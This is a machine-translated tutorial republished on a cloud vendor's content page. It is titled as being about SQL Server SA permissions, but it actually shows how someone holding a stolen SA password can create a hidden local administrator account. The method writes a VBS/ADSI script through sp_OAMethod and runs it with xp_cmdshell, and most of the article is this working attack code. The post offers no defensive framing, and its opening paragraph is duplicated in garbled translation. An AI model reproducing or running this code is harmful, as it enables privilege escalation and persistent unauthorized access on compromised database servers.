Microsoft SQL Server SA permissions security

Source: Internet
Author: User
Tags add object microsoft sql server sql net
After obtaining the SA password, the Administrator account cannot be added because the Server Manager or "predecessors" will net.exe and Net1.exe be restricted to use. We know that VBS has a Winnt object in the Active Directory (ADSI) that manages local resources and can be used to add an administrator without relying on commands like CMD, as follows:

After obtaining the SA password, the Administrator account cannot be added because the Server Manager or "predecessors" will net.exe and Net1.exe be restricted to use. We know that VBS has a Winnt object in the Active Directory (ADSI) that manages local resources and can be used to add an administrator without relying on commands like CMD, as follows:


Set Wsnetwork=createobject ("Wscript.Network")
os= "winnt://" &wsnetwork.computername
Set ob=getobject (OS) ' Gets ADSI interface, binding
Set Oe=getobject (os& "/administrators,group") ' Property, admin Group
Set Od=ob. Create ("User", "test") ' Create user
Od. SetPassword "1234" ' Set password
Od. SetInfo ' Save
Set of=getobject (os& "/test", user) ' Gets the user
Oe.add os& "/test"


Save the above code as 1.vbs, and then execute with the command "cscript 1.vbs", which adds a user with a system name of test and a password of 1234. The code executed in Query Analyzer is as follows:


Declare @o int, @f int, @t int, @ret int
exec sp_oacreate ' Scripting.FileSystemObject ', @o out
exec sp_ Oamethod @o, ' CreateTextFile ', @f out, ' C:\1.vbs ', 1
exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' Set Wsnetwork=cre Ateobject ("WSCRIPT.") Network ") '
exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' os= ' winnt://' &wsnetwork. ComputerName '
Exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' Set ob=getobject (OS) '
exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' Set oe=getobject (os& "/administrators,group") '
exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' Set Od=ob. Create ("User", "test") '
exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' od. SetPassword "1234" '
exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' od. SetInfo '
Exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' Set of=getobject (os& '/test ', user) '
exec @ret = sp_ Oamethod @f, ' WriteLine ', NULL, ' Oe.add os& '/test '


Execute the above statement, and then execute the following line of code, this line of code must be executed separately, not with the above put together to execute, or you will be prompted "C:\1.vbs is being run by another program" and cannot successfully add users:


EXEC master.. xp_cmdshell ' cscript c:\1.vbs '


If the system user did not add success, it is possible because the system user's password 1234 is too simple, does not conform to the server's complex password policy, you can consider the setting more complex, and then test. You can also use Echo to write code to 1.vbs, in the form of:


EXEC master.. xp_cmdshell ' echo Set Wsnetwork=createobject ("Wscript.Network") >>1.vbs '



Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.